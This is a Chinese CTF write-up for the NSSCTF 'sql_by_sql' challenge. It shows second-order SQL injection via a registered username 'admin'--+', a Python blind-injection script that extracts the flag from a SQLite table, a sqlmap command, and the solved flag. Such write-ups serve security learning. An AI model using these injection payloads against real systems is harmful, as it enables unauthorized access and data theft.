[NSSRound#1 Basic]sql_by_sql

  • 开发
  • 36

[NSSRound#1 Basic]sql_by_sql

这题没啥难的,二次注入+盲注的套题

先注册,进去有个修改密码
可能是二次注入

image-20240506005829603

修改密码处源码

<!-- update user set password='%s' where username='%s'; -->

重新注册一个admin'--+
获得admin身份(原理看sqli-labs,20多关来着:【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析_sqlilabs靶场1–65过关-CSDN博客

image-20240506010418482

image-20240506010437849

在/query下盲注查询

import requests
import string

str = string.ascii_letters + string.digits

url = "http://node4.anna.nssctf.cn:28926/query"
s = requests.session()
headers = {'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZjfMvg.GIZuH3fe_fhe_TTllzNnIvaVWpo'}

if __name__ == "__main__":
    name = ''
    for i in range(0,100):
        char = ''
        for j in str:
            #表+字段
            #payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j)
            #数据
            payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j)
            data = {"id": payload}
            r = s.post(url=url, data=data, headers=headers)
            #print(r.text)
            if "exist" in r.text:
                name += j
                print (j, end='')
                char = j
                break
        if char == '%':
            break

image-20240506022554209

NSSCTF{cdec206d-5ddb-4ea1-ac9a-292429de2911}

sqlmap打法:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28926/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZjfMvg.GIZuH3fe_fhe_TTllzNnIvaVWpo"
阅读全部

相关推荐

  7. [NSSRound#21] pwn专场

    2024-05-16 00:04:09       26 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-16 00:04:09       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-16 00:04:09       100 阅读

  9. 在Django里面运行非项目文件

    2024-05-16 00:04:09       82 阅读

  19. Python语言-面向对象

    2024-05-16 00:04:09       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-05-16 00:04:09       85 阅读

热门阅读

  4. Unity Mirror 从入门到入神(二)

    2024-05-16 00:04:09       36 阅读

  5. nmap端口扫描工具——LInux

    2024-05-16 00:04:09       33 阅读

  6. C中Mysql的基本api接口

    2024-05-16 00:04:09       28 阅读

  11. c语言基础

    2024-05-16 00:04:09       28 阅读

  14. ICSE docker related research

    2024-05-16 00:04:09       37 阅读

  15. 【ARM 嵌入式 C 入门及渐进 1.2 -- 是否为 n 字节对齐】

    2024-05-16 00:04:09       34 阅读

  16. 计算年龄案例

    2024-05-16 00:04:09       30 阅读

  17. 网站开发之前端和后端开发的区别和联系

    2024-05-16 00:04:09       40 阅读

  20. [数组专题]力扣88

    2024-05-16 00:04:09       27 阅读

  24. 用于接收参数的几个注解

    2024-05-16 00:04:09       32 阅读

  29. 2024年成都高新区支持企业申报国家、省级、市级大数据产业发展、新一代信息技术与制造业融合发展、工业互联网推广应用等试点示范项目申报对象条件和奖补

    2024-05-16 00:04:09       28 阅读

  30. Go 处理错误&异常

    2024-05-16 00:04:09       37 阅读